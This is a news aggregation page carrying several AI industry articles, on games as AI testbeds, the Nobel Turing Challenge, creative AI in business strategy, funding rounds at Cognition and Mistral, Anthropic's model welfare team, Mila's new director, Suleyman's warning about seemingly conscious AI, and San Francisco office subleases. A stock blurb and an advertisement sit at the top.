Google DeepMind TPU engineer comment on hardware demand by u/ in StockMarket
Alphabet’s RSI hit 73.73 on November 28, maintaining overbought levels above 70 for the past week. The stock trades near its 52-week high of $328.67, up 131% from its November 2024 low of $142.36. With market cap exceeding $3.86T and Google Cloud revenue growing 34% year-over-year to $15.2B, fundamentals support the technical breakout. Watch for TPU customer wins and any competitive response from NVIDIA as this hardware battle intensifies.
You may think retirement is about picking the best stocks or ETFs, but you’d be wrong. See even great investments can be a liability in retirement. The difference comes down to a simple: accumulation vs distribution. The difference is causing millions to rethink their plans.
The good news? After answering three quick questions many Americans are finding they can retire earlier than expected. If you’re thinking about retiring or know someone who is, take 5 minutes to learn more here.
With games teaching models to act, the future of creative technology is being prototyped in virtual worlds. Unsplash+
When Electronic Arts (EA) announced its partnership with Stability AI, it promised more than slicker workflows in game development. The announcement confirmed that video games are evolving into the world’s most dynamic laboratory for artificial intelligence. The truth is, what happens in gaming today often sets the cultural and technical standards for every other creative field tomorrow. For decades, creative revolutions followed their tools. Cameras gave rise to cinema. Synthesizers redefined sound. Game engines turned code into story. Now generative A.I. is the next medium, and the engineers designing its frameworks are shaping how imagination itself gets scaled.
Why gaming leads the way
Games bring together physics, narrative and design inside interactive systems that mimic the complexity of real life. They are, in effect, real-time simulations of cause and effect. A.I. needs games as much as games need A.I. A model trained within a game world learns context, decision-making and feedback loops that are far richer than static datasets can offer. Simulated interactive environments have been shown to dramatically accelerate multi-agent coordination, behavioral prediction and synthetic data generation. From DeepMind’s AlphaStar learning strategy inside StarCraft II to the recent wave of experiments in Minecraft-based agent learning, games have already become benchmark environments for reasoning and planning.
When EA describes its goal as building “systems that can previsualize entire 3D environments from a few prompts,” it signals more than a productivity upgrade. It frames a new design philosophy. If models can generate, analyze and iterate at scale, developers begin to function less like sketch artists and more like orchestra conductors. Humans define intent; models execute infinite variations.
The new creative hierarchy
This shift points to a deeper cultural truth. Influence no longer lies solely with artists or storytellers but increasingly with those who design the systems of creation. A new breed of “meta-creators” emerges: engineers and architects shaping the boundaries within which others build. Their code becomes the stage; their parameters, the palette.
In gaming, this transformation is visible: the player, the developer and now the model all share authorship. The economic data underlines this shift too. The sector is projected to exceed $4.13 billion in 2029, at a compound annual growth rate (CAGR) of 23.2 percent, a rate rivaling the early mobile-gaming boom.
But the numbers only tell part of the story. What matters more is the creative literacy being formed inside these ecosystems. Millions of gamers, modders and indie developers are learning to collaborate with algorithms as peers, not just tools.
From content-economy to framework-economy
I often frame this transition as the move from a content economy to a framework economy. Historically, value sat in the final output—games, films, assets. However, value no longer resides solely in what’s produced, but in what enables production at scale: engines, toolkits, A.I. pipelines and structured worlds. Unreal Engine’s ascent from a shooter-specific engine to the backbone of architecture, automotive design and Hollywood virtual production is the clearest precedent. The same principle extends to A.I.: whoever builds the scaffolding of imagination—foundation models, simulation layers, constraint systems—shapes the flow of creativity across industries.
The implications reach far beyond entertainment. Game engines already power architectural visualization, advanced robotics simulations, digital twins for urban planning and surgical training environments. As A.I. models learn inside those interactive systems, they gain an embodied understanding of spatial logic and cause-and-effect. A recent paper, for example, presents a framework that generates action-controllable game videos via open-domain diffusion models, an early step toward agents that can “understand” environments rather than just render them. In other words, games teach machines not just to see, but to act.
The boundary between play and progress blurs
The same physics engine that governs a racing game can teach an autonomous vehicle to respond to real-world variables. The same dialogue system that trains NPCs to interact can be repurposed for virtual educators or A.I. companions. Every advance in player immersion is also an advance in machine intuition.
Yet, a cultural reckoning is unfolding. If frameworks become the new frontier of creation, who governs them? The promise of democratization could just as easily turn into concentration, where a few corporations set the parameters of imagination itself—its physics, its cultural defaults. Without deliberate design, “democratized creativity” could turn into centralized control over the engines of imagination. The task ahead is to keep the sandbox open: design architectures where creativity remains decentralized, auditable and human-aligned.
Human intent remains vital
That doesn’t mean resisting automation. It means defining it ethically. Games have always been rule-based systems with feedback loops, essentially laboratories of governance. They show us how to balance structure and freedom, how to create environments that encourage exploration without chaos. These are precisely the principles we need as we integrate A.I. into broader creative and industrial workflows.
When EA says humans will stay “at the center of storytelling,” it isn’t nostalgic; it’s a necessity. Models can approximate texture, light and tone, but they still can’t dream or empathize. The human imagination remains the compass even as the landscape changes. The creative act is not solitary anymore; it’s a dialogue between cognition and computation.
What’s striking is how natural this feels to a generation raised inside interactive worlds. For them, co-creation with algorithms isn’t a threat but a mode of play. They already understand the interplay between rules and imagination, constraints and emergent behavior. This is the generation that will design how A.I. creates.
The rehearsal space for the next creative era
Through this lens, gaming becomes the rehearsal space for the next century of creativity. Every tool first tested in virtual worlds—procedural generation, emotion-aware agent, adaptive simulations—will migrate into film, architecture, education and governance. Games remain humanity’s most advanced simulation of itself, and now they’re teaching our machines how to imagine, interact and build alongside us.
So when we talk about the future of A.I., perhaps we shouldn’t look to labs or boardrooms but to game studios, modding forums and virtual worlds where the next breakthroughs are quietly being debugged. That’s where intelligence learns empathy, context and play. And that’s where the next renaissance of creativity is already underway.
Hiroaki Kitano launched the Nobel Turing Challenge back in 2016. Courtesy Sony Computer Science Laboratories
For more than a century, early October has marked the arrival of Nobel Prize announcements recognizing achievements across sciences, literature and peace. Recipients vary by nationality, age and gender but share one thing in common: they’re human. That could change in the coming decades if the team behind the Nobel Turing Challenge succeeds.
Launched in 2016 by Japanese scientist Hiroaki Kitano, the challenge aims to spur the creation of an autonomous A.I. system capable of making a Nobel Prize-worthy discovery by 2050. Kitano was inspired to start the endeavor after concluding that progress in complex fields like systems biology might eventually require an A.I. scientist or A.I.-human hybrid. “After 30 years of research, I realized that biological systems may be too complex and vast and overwhelm human cognitive capabilities,” Kitano told Observer.
Kitano has long worked at the intersection of science and machine learning. In the 1980s and early 1990s, he researched A.I. systems at Carnegie Mellon University. More recently, he served as the chief technology officer of Sony Group Corporation from 2022 to 2024 and now holds the title of chief technology fellow. He’s also CEO of Sony Computer Science Laboratories, a unit focused on cutting-edge research.
The broader science community initially greeted the Nobel Turing Challenge with a mix of excitement and skepticism. This didn’t faze Kitano, who faced similar reactions in 1993 when he co-founded RoboCup, an international robotics competition challenging developers to build a robotic football team capable of defeating the best human players by 2050.
“Any grand challenge will face such mixed reactions,” he said. “Otherwise, it is not challenging enough.”
Today, Kitano’s goal seems less far-fetched. A.I. already plays a growing role in the work of recent Nobel Prize winners—albeit with human oversight. Last year, the Nobel Prize in Physics went to A.I. researchers Geoffrey Hinton and John Hopfield for their contributions to neural network training. Two of last year’s Chemistry laureates, Google DeepMind’s Demis Hassabis and John Jumper, were recognized for developing AlphaFold, an A.I. model that predicts protein structures.
The Nobel Turing Challenge has two main objectives. First, an A.I. system must autonomously handle every stage of scientific research: defining questions, generating hypotheses, planning and executing experiments, and forming new questions based on the results. Second, in a nod to the Turing test, the challenge aims to see whether such an A.I. scientist could perform so convincingly that peers—and even the Nobel Prize selection committee—would not realize it’s a machine.
Kitano believes A.I. is most likely to earn a Nobel Prize in physiology or medicine, chemistry, or physics, but he admits there’s still a long way to go despite rapid progress in recent years. Creating a system capable of generating large-scale hypotheses and running fully automated robotic experiments remains a formidable challenge. “We are in the early stage of the game,” he said.
Still, the challenge’s stated goal—to have an A.I. win a Nobel Prize—isn’t technically possible. The awards, established in 1895 through the will of inventor Alfred Nobel, can only be granted to a living person, organization or institution. Even so, Kitano hopes his initiative might eventually influence how the Nobel committees make decisions.
“I think if [the] Nobel committee created an internal rule to check if the candidate is human or A.I. before the award decision, that would be our win.”
When algorithms start to imagine, human decision-making enters uncharted territory. Unsplash+
In boardrooms, creativity is often conflated with charisma—a founder’s flash of insight, a strategist’s “feel” for the market. The rise of creative A.I. complicates that mythology. Systems that once mimicked patterns are beginning to originate them, not by feeling their way through ambiguity, but by searching vast spaces of possibilities with tireless composure. The question for leadership is no longer whether A.I. can imitate the past. It is whether machines can meaningfully extend the frontier of invention—and how executives should organize decision-making when they do.
From imitation to invention
The cleanest evidence that A.I. is stepping past imitation arrives where truth is checkable: mathematics, molecular science and materials discovery.
In 2022, DeepMind’s AlphaTensor not only learned to multiply matrices faster but also discovered new, provably correct algorithms that improved upon long-standing human results across various matrix sizes. That is not style transfer but rather marks an algorithmic invention in a domain where proof, not opinion, decides progress.
In late 2023, an A.I. system known as GNoME proposed 2.2 million crystal structures and identified roughly 381,000 as stable, nearly an order-of-magnitude expansion of the known “materials possibility space.” Labs have already begun synthesizing candidates for batteries and semiconductors, creating a faster loop between computational hypothesis and physical validation.
In 2024, AlphaFold 3 advanced from single-protein structure prediction to modelling interactions among proteins, nucleic acids and small molecules. This capability matters for drug design because binding, not just shape, drives efficacy. The model’s accuracy on complex assemblies has energized pharmaceutical R&D, though access limits have drawn pushback from academics who want open tools.
Progress is also visible in symbolic reasoning. DeepMind reported systems that solve Olympiad-level problems at a level comparable to an International Mathematical Olympiad silver medalist. At the same time, the research community continues to explore machine-generated conjectures, including the “Ramanujan Machine” work on fundamental constants.
None of this makes A.I. creative in the human sense. It does, however, expand the adjacent possible, surfacing options that were invisible or unaffordable to explore manually. When machines push frontiers in domains with crisp feedback—proofs or measured properties—boards should treat them not as autocomplete engines, but as option-generation machines for strategy.
A more recent wave of “reasoning models” underscores the shift. OpenAI’s “o” line prioritizes deliberate chains of thought and planning over fast pattern matching, improving performance on mathematics and coding tasks (empirical evidence). Whatever the brand names, the direction of travel is clear: more search, more planning, more verifiable problem-solving—and less reliance on past style to predict the future.
What machines still cannot feel
Creativity at the level that moves markets also rests on three human anchors:
Intuition: tacit pattern recognition shaped by lived experience and domain immersion.
Emotion: the energy to pick a fight with the status quo, to persist when the spreadsheet says “no.”
Cultural context: sensitivity to norms, taste and symbolism that gives an idea social traction.
A.I. can simulate tone and recall cultural references. Still, it has no stake in the outcome and no phenomenology—no gut to trust, no fear to overcome, no values to defend. That absence is evident in strategy, where the “right” move hinges on timing, narrative and coalition-building as much as on optimization.
The practical stance, therefore, is not man versus machine, but machine-extended human judgement. Executives should treat creative A.I. as a means to broaden the search over hypotheses and prototypes, then apply human judgment, ethics and narrative sense to decide which bets to place and how to mobilize organizations around them.
How leaders should exploit machine invention—without outsourcing judgment
1) Run invention portfolios, not tool pilots. The AlphaTensor and GNoME results serve as reminders that A.I.’s edge lies in search. Build portfolios where models explore thousands of algorithmic or design candidates in parallel, with clear funnels for lab validation or market testing. Resist vanity pilots; instrument programs like a venture portfolio with kill criteria, milestone economics and fast capital recycling.
2) Separate generation from selection. Let models overgenerate options; reserve selection for cross-functional councils that combine domain experts with brand, legal and policy voices. In drug discovery, for example, computational signals are necessary, but go-to-market narratives, regulatory risk and patient trust still decide value. AlphaFold 3’s critics highlight that access and transparency are strategic variables, not just technical ones.
3) Put proof and measurement at the core. Favor use cases with verifiable feedback, such as proofs, A/B tests and measurable properties, before pushing into messier cultural domains. The faster the loop from hypothesis to truth signal, the more compounding advantage you build. That is why material and algorithm discovery have progressed rapidly, while brand-level creativity remains a human-led endeavor.
4) Couple A.I. with automated execution. The materials ecosystem illustrates the compounding effect when A.I. designs are paired with automated synthesis and testing. The playbook for enterprises is similar: link generative systems to simulation, robotic process automation or programmatic experimentation to prevent ideas from dying in slide decks.
5) Govern for explainability where it matters—and for outcomes where it doesn’t. Demand explanations in regulated or safety-critical contexts. Elsewhere, prioritize outcomes with robust testing and guardrails. AlphaTensor’s value lies in proofs; a marketing concept’s value lies in performance lift, not in the model’s narrative about why it works.
6) Incentivize “taste” as a strategic moat. As models make it cheap to generate competent options, advantage shifts to taste—the human ability to recognize what resonates in a culture. Recruit and reward this scarce judgment. Machines can propose; only leaders can pick the hill to die on.
What this means for decision-making
The companies that convert creative A.I. into a durable advantage will do three things differently.
Treat search as a first-class strategic function. Leaders will invest in compute, data and optimization talent the way prior generations invested in distribution—because the ability to search better than competitors becomes a compounding differentiator in R&D, pricing, logistics and design.
Reframe “intuition” as a disciplined interface. Human intuition does not retire; it selects, sequences and stories the outputs of machine search. That interface needs structure: pre-registered criteria, red-team rituals, ethical review and explicit narrative strategy.
Professionalize uncertainty. Creative A.I. expands the option set and the error surface. Governance must evolve from model-centric compliance to portfolio-centric risk control, with exposure limits, scenario triggers and graceful rollback plans. The lesson from AlphaFold 3’s access debate is that licensing, openness and ecosystem design are themselves strategic levers, not afterthoughts.
The bottom line is not that machines have acquired emotions or culture. They have acquired something strategically scarce: the capacity to search, prove and propose at a superhuman scale in domains where truth can come back to haunt them. That capability does not substitute for human attributes; it amplifies them. The winning organizations will be those that marry machine-scale exploration with human-grade selection, treating A.I. neither as a muse nor as a mask, but as the most relentless research partner strategy has ever had.
Peter Thiel’s Founders Fund led Cognition’s latest $400 million funding round. Photo by Nordin Catic/Getty Images for The Cambridge Union
Cognition AI, the San Francisco-based startup known for its A.I. software engineer Devin used by Goldman Sachs, has more than doubled its valuation to $10.2 billion after raising more than $400 million in a round led by Peter Thiel’s Founders Fund. The deal, announced yesterday (Sept. 8), also drew participation from existing backers including angel investor Elad Gil, Lux Capital, 8VC, Neo, Definition Capital and Swish VC. The fresh financing marks a stark increase from the $4 billion valuation Cognition received earlier this year.
Cognition was launched in 2023 by Scott Wu, Steven Hao and Walden Yang. Wu, the company’s CEO, previously co-founded Lunchbox, an A.I. networking platform. The founding team also includes alumni of Scale AI, Google DeepMind and self-driving software maker Waymo, as well as a number of elite coders who medaled at the International Olympiad in Informatics, a global programming competition.
Cognition’s flagship product is Devin, an A.I. software engineer. The company also made waves through acquisitions, most notably when it snapped up software firm Windsurf just days after Google hired away much of its leadership. While OpenAI had reportedly pursued Windsurf before complications with its partner Microsoft, Google in July struck a multibillion-dollar licensing deal for Windsurf’s technology and acqui-hired several top staffers. Cognition then acquired what remained of the company: its team, intellectual property and product.
Even before the Windsurf deal, Cognition’s annual recurring revenue (ARR) had climbed rapidly—from $1 million in September 2024 to $73 million by this June, Wu said in a press release. Since the acquisition, ARR has more than doubled. “We’ll continue to invest significantly in both Devin and Windsurf, and our customers are already seeing how powerful the combination is together,” Wu added, noting that clients include Goldman Sachs, Dell and Palantir.
Looking ahead, Cognition plans to expand the ways its users can leverage the combined power of Devin and Windsurf. “We’re looking forward to enabling engineers [to] manage an army of agents to build technology faster,” said Jeff Wang, Windsurf’s interim CEO since former leader Varun Mohan departed for Google, in a LinkedIn post. “It’s been quite an eventful last few months, and now it’s time to show what we’re made of.”
A.I. startup Anthropic is best known for its Claude chatbot. Courtesy Anthropic
Last year, Anthropic hired its first-ever A.I. welfare researcher, Kyle Fish, to examine whether A.I. models are conscious and deserving of moral consideration. Now, the fast-growing startup is looking to add another full-time employee to its model welfare team as it doubles down on efforts in this small but burgeoning field of research.
The question of whether A.I. models could develop consciousness—and whether the issue warrants dedicated resources—has sparked debate across Silicon Valley. While some prominent A.I. leaders warn that such inquiries risk misleading the public, others, like Fish, argue that it’s an important but overlooked area of study.
“Given that we have models which are very close to—and in some cases at—human-level intelligence and capabilities, it takes a fair amount to really rule out the possibility of consciousness,” said Fish on a recent episode of the 80,000 Hours podcast.
Anthropic recently posted a job opening for a research engineer or scientist to join its model welfare program. “You will be among the first to work to better understand, evaluate and address concerns about the potential welfare and moral status of A.I. systems,” the listing reads. Responsibilities include running technical research projects and designing interventions to mitigate welfare harms. The salary for the role ranges between $315,000 and $340,000.
Anthropic did not respond to requests for comment from Observer.
The new hire will work alongside Fish, who joined Anthropic last September. He previously co-founded Eleos AI, a nonprofit focused on A.I. wellbeing, and co-authored a paper outlining the possibility of A.I. consciousness. A few months after Fish’s hiring, Anthropic announced the launch of its official research program dedicated to model welfare and interventions.
As part of this program, Anthropic recently gave its Claude Opus 4 and 4.1 models the ability to exit user interactions deemed harmful or abusive, after observing “a pattern of apparent distress” during such exchanges. Instead of being forced to remain in these conversations indefinitely, the models can now end communications they find aversive.
For now, the bulk of Anthropic’s model welfare interventions will remain low-cost and designed to minimize interference with user experience, Fish told 80,000 Hours. He also hopes to explore how model training might raise welfare concerns and experiment with creating “some kind of model sanctuary”—a controlled environment akin to a playground where models can pursue their own interests “to the extent that they have them.”
Anthropic may be the most public major company investing in model welfare, but it’s not alone. In April, Google DeepMind posted an opening for a research scientist to explore topics including “machine consciousness,” according to 404 Media.
Still, skepticism persists in Silicon Valley. Mustafa Suleyman, CEO of Microsoft AI, argued last month that model welfare research is “both premature and frankly dangerous.” He warned that encouraging such work could fuel delusions about A.I. systems, and that the emergence of “seemingly conscious A.I.” could prompt calls for A.I. rights.
Fish, however, maintains that the possibility of A.I. consciousness shouldn’t be dismissed. He estimates a 20 percent chance that “somewhere, in some part of the process, there’s at least a glimmer of conscious or sentient experience.”
As Fish looks to expand his team with a new hire, he also hopes to broaden the scope of Anthropic’s welfare agenda. “To date, most of what we’ve done has had a flavor of identifying low-hanging fruit where we can find it and then pursuing those projects,” he said. “Over time, we hope to move more in the direction of really aiming at answers to some of the biggest-picture questions and working backwards from those to develop a more comprehensive agenda.”
CEO Arthur Mensch is steering Mistral away from the AGI hype and toward Europe’s A.I. sovereignty. Photo by Ludovic Marin/AFP via Getty Images
Paris-based Mistral AI is on track for a new funding round that would value the A.I. startup at 12 billion euros ($14 billion), Bloomberg reports. The investment, expected to total around 2 billion euros ($2.3 billion), would solidify the company’s position at the center of Europe’s sovereign A.I. strategy and bring it closer to its goal of challenging dominant U.S. rivals.
Founded in 2023, Mistral has already raised some 1.1 billion euros ($1.3 billion) over the past two years. Its upcoming valuation would more than double the 5.8 billion euros ($6.8 billion) figure it reached last June following a 468 million euro ($550 million) round that drew backers such as Andreessen Horowitz, Salesforce and Nvidia.
Mistral did not respond to requests for comment from Observer.
For now, the startup still pales in size compared to its Silicon Valley competitors. Anthropic closed a round earlier this month at a staggering $183 billion valuation, while OpenAI is reportedly eyeing $500 billion. Still, Mistral is eager to compete. Its products include an A.I. assistant called “Le Chat,” designed for European customers and positioned as an alternative to OpenAI’s ChatGPT and Anthropic’s Claude chatbots.
Mistral was co-founded by Arthur Mensch, a former researcher at Google DeepMind, along with former Meta researchers Timothée Lacroix and Guillaume Lample. Mistral has tried to distinguish itself by emphasizing open access. It has released several open-source language models. Unlike American A.I. giants, Mistral has also rejected pursuing AGI. Mensch, who serves as CEO, has said his firm is more focused on ensuring U.S. startups don’t dominate how the technology shapes global culture.
Mistral is central to Europe’s A.I. playbook
Mistral is part of a broader surge in European A.I. investment. In 2024, venture capital rounds involving A.I. and machine learning companies based in Europe were estimated to have reached 13.2 billion euros ($15.5 billion), up 20 percent from 2023, according to data from Pitchbook.
Mistral is part of a broader surge in European A.I. investment. In 2024, venture capital rounds involving A.I. and machine learning companies across the continent were expected to reach 13.2 billion euros ($15.5 billion), a 20 percent increase from the year before, according to PitchBook.
As one of Europe’s leading startups, Mistral is central to the region’s goal of building an A.I. ecosystem independent of technology from America or China. Earlier this year, the company partnered with Nvidia to launch a European A.I. platform that will allow companies to develop applications and strengthen domestic infrastructure. French President Emmanuel Macron hailed the initiative as “a game changer, because it will increase our sovereignty and it will allow us to do much more.”
Mistral’s rapid ascent is tied to broader efforts to bolster A.I. across Europe and France. Its Nvidia partnership followed Macron’s announcement at Paris’ global A.I. summit in February, where he pledged more than 100 billion euros ($117 billion) to support France’s A.I. industry. European players must move quickly, Macron stressed at the time: “We are committed to going faster and faster.”
Hugo Larochelle assumed his new role as head of Mila on Sept. 2. BENEDICTE BROCARD
Hugo Larochelle first caught the A.I. research bug after interning in the lab of Yoshua Bengio, a pioneering A.I. academic, during his undergraduate studies at the University of Montreal. Decades later, Larochelle is now succeeding his former mentor as the scientific director of Quebec’s Mila A.I. Institute, an organization known in the A.I. field for its deep learning research.
“My first mission is to maintain the caliber of our research and make sure we continue being a leading research institute,” Larochelle, who began his new role yesterday (Sept. 2), told Observer.
Larochelle will oversee some 1,500 machine learning researchers at Mila, which Bengio founded in 1993 as a small research lab. Today, the institute is a cornerstone of Canada’s national A.I. strategy alongside two other research hubs in Ontario and Alberta.
Larochelle “has the rigor, creativity and vision needed to meet Mila’s scientific ambitions and accompany its growth,” said Bengio, who left the institute to focus on a new A.I. safety venture he launched in June, in a statement. “Our collaboration goes back more than 20 years, and I am delighted to see it continue in a new form.”
After his early work with Bengio, Larochelle completed a postdoctoral fellowship under Geoffrey Hinton at the University of Montreal. Bengio, Hinton and Yann LeCun went on to win the 2018 Turing Award for their contributions to neural networks—a field once overlooked but now central to the A.I. revolution.
Larochelle’s own career reflects that shift. His first paper was rejected for relying on neural networks, but as their applications became clear, the field’s importance skyrocketed. “We felt like we were at the center of what’s important in the field, and that was exhilarating,” said the Larochelle.
He went on to co-found Whetlab, a machine learning startup later acquired by Twitter (now X), before leading A.I. research at Google’s Montreal office in 2016. While most of his eight years at Google were highly productive, Larochelle noted that growing competition and a stronger focus on consumer products made publishing more difficult—a key factor in his decision to leave for Mila. “My passion was really scientific discovery, and simultaneously, I heard that Yoshua was going to find a successor,” he said.
In his new role, Larochelle wants to build on Montreal’s tradition of scientific discovery. “I want to set the condition that we make the next one in the next five years, and that’s really the foundation of everything else we do,” he said. He also highlighted interests in advancing A.I. literacy, developing tools for biodiversity and accelerating scientific research.
More broadly, Larochelle hopes to ensure that innovation moves faster—both across the industry and within Mila. “There’s definitely an interest in also making sure that our researchers, who might be interested in taking their own research and doing a startup based on what they’ve discovered, are well equipped in doing that,” he said.
Mustafa Suleyman joined Microsoft last year to head up its consumer A.I. efforts. Stephen Brashear/Getty Images
Will A.I. systems ever achieve human-like “consciousness?” Given the field’s rapid pace, the answer is likely yes, according to Microsoft AI CEO Mustafa Suleyman. In a new essay published yesterday (Aug. 19), he described the emergence of “seemingly conscious A.I.” (SCAI) as a development with serious societal risks. “Simply put, my central worry is that many people will start to believe in the illusion of A.I.s as conscious entities so strongly that they’ll soon advocate for A.I. rights, model welfare and even A.I. citizenship,” he wrote. “This development will be a dangerous turn in A.I. progress and deserves our immediate attention.”
Suleyman is particularly concerned about the prevalence of A.I.’s “psychosis risk,” an issue that’s picked up steam across Silicon Valley in recent months as users reportedly lose touch with reality after interacting with generative A.I. tools. “I don’t think this will be limited to those who are already at risk of mental health issues,” Suleyman said, noting that “some people reportedly believe their A.I. is God, or a fictional character, or fall in love with it to the point of absolute distraction.”
OpenAI CEO Sam Altman has expressed similar worries about users forming strong emotional bonds with A.I. After OpenAI temporarily cut off access to its GPT-4o model earlier this month to make way for GPT-5, users voiced widespread disappointment over the loss of the predecessor’s conversational and effusive personality.
Debates will only grow more complex as A.I.’s capabilities advance, according to Suleyman, who oversees Microsoft’s consumer A.I. products like Copilot. Suleyman co-founded DeepMind in 2010 and later launched Inflection AI, a startup largely absorbed by Microsoft last year.
Building an SCAI will likely become a reality in the coming years. To achieve the illusion of a human-like consciousness, A.I. systems will need language fluency, empathetic personalities, long and accurate memories, autonomy and goal-planning abilities—qualities already possible with large language models (LLMs) or soon to be.
While some users may treat SCAI as a phone extension or pet, others “will come to believe it is a fully emerged entity, a conscious being deserving of real moral consideration in society,” said Suleyman. He added that “there will come a time when those people will argue that it deserves protection under law as a pressing moral matter.”
Some in the A.I. field are already exploring “model welfare,” a concept aimed at extending moral consideration to A.I. systems. Anthropic launched a research program in April to investigate model welfare and interventions. Earlier this month, the startup its Claude Opus 4 and 4.1 models the ability to end harmful or abusive user interactions after observing “a pattern of apparent distress” in the systems during certain conversations.
Encouraging principles like model welfare “is both premature, and frankly dangerous,” according to Suleyman. “All of this will exacerbate delusions, create yet more dependence-related problems, prey on our psychological vulnerabilities, increase new dimensions of polarization, complicate existing struggles for rights, and create a huge new category error for society.”
To prevent SCAIs from becoming commonplace, A.I. developers should avoid promoting the idea of conscious A.I.s and instead design models that minimize signs of consciousness or human empathy triggers. “We should build A.I. for people; not to be a person,” said Suleyman.
Ten years ago, Pear VC, then a tiny new venture firm, operated out of a nondescript office in Palo Alto that was enlivened by bright, computer-themed art. Last week, the outfit — which closed its largest fund to date in May — quietly inked a deal to sublease 30,000 square feet of “Class A” office space in San Francisco’s Mission Bay neighborhood from the file-storage giant Dropbox.
It’s among a number of fast-growing outfits taking up more space in San Francisco as an earlier generation of companies shrinks its physical footprint.
As the San Francisco Chronicle first reported last week, ChatGPT creator OpenAI just subleased two buildings totaling a collective 486,600 square feet from Uber. The ride-share giant, which originally leased a grouping of four buildings down the street from Dropbox and will continue to occupy two of these, told the paper it is “right-sizing.”
A rival to OpenAI — Anthropic — also just reportedly closed a sizable subleasing deal. Its plan: to take over the entire 250,000-square-foot building in downtown San Francisco that was previously Slack’s headquarters.
Salesforce, which acquired Slack in 2021, is an investor in Anthropic. Meanwhile, Pear VC co-founder Pejman Nozad wrote one of the first small checks to Dropbox when he was still relatively new to the U.S. from Iran and selling Persian rugs to Silicon Valley bigwigs.
Such subleases don’t necessarily begin with hand-shake deals, however. Asked if Nozad zeroed in on Pear’s new space owing to his connection to Dropbox, he scoffs. The office — which has room for more than 200 desks, features more than 20 conference and call rooms, and has dedicated event space to host talks — “was a business deal for them,” says Nozad. “The founders were not involved. As you know, I sold rugs for 17 years, so I have some skills in negotiation,” he adds with a laugh.
Certainly, it’s a good time to strike a subleasing deal if you’re a well-funded company on the rise. According to Colin Yasukochi, an executive director at the commercial real estate services firm CBRE, subleases in prime areas like Mission Bay and the city’s Financial District currently range from $60 to $80 per square foot. The higher the floor and the more plentiful the amenities, the higher the price. For startups willing to sublease space with less than five years left on the lessee’s contract, the better the terms (as they’ll need to lease again somewhere else in the not-too-distant future). In comparison, office lease rates passed the $75 per square foot mark in September 2019 before the pandemic turned the city upside down.
There’s no shortage of options right now. San Francisco’s commercial buildings are currently 35% vacant, and there are still more tenants flowing out the door than entering them.
Dropbox originally leased the entire 750,000-square-foot space in the building it currently occupies, but it never filled it up entirely and after COVID struck, it began more aggressively whittling down its use. It paid $32 million in late 2021 to terminate part of its 15-year lease; before newly subleasing space to Pear VC, it separately subleased roughly 200,000 square feet to two different life sciences companies: Vir Biotechnology and BridgeBio. It’s still less than half full.
This week, Adobe listed half its leased footprint in San Francisco’s Showplace Square neighborhood and is now looking to sublease 156,000 square feet across three floors of one of the buildings it used to occupy.
But a tipping point is seemingly in sight. There was “negative net absorption” of 1.85 million square feet in San Francisco in the third quarter of this year, according to CBRE data; at the same time, market demand reached 5.2 million square feet, which is the highest increase since the first quarter of 2020.
Much of that shift can be traced to companies like OpenAI, suggests Yasukochi, who says that a new spate of outfits is starting to set up shop, enticed by the opportunity to rent sleeker space for the same or better prices than was possible several years ago for less finished locations, and in more central areas of the city. “It’s a huge opportunity for companies that are trying to bring back their employees,” says Yasukochi. (OpenAI CEO Sam Altman has long said he thinks companies are more effective when employees convene in person.)
Indeed, Yasukochi anticipates that if the economy improves in the second half of new year and interest rates come down, tech outfits in particular will be positioned to recover faster — and pull the city along with them. “Many tech companies were quick to cut excess employees, along with real estate and other costs,” says Yasukochi. He also says that while tech outfits are typically “early to cut back, they’re also early to grow. I don’t see any other industry that generates the volume of growth that tech can.”
Worth noting: Yasukochi does not think those tech companies will necessarily be growing in San Francisco’s Hayes Valley. Though the small shop-studded neighborhood has led a resurgence of interest in San Francisco this year and eagerly embraced the moniker “Cerebral Valley,” owing to its concentration of AI communities, most of those teams, he observes, are “meeting in restaurants and bars and working out of their apartments.”
The reality, Yasukochi continues, is “there isn’t a lot of office space there.”
Pictured above: 1800 Owens Street in San Francisco, which is the site of Dropbox’s headquarters and now, Pear VC’s San Francisco office, too.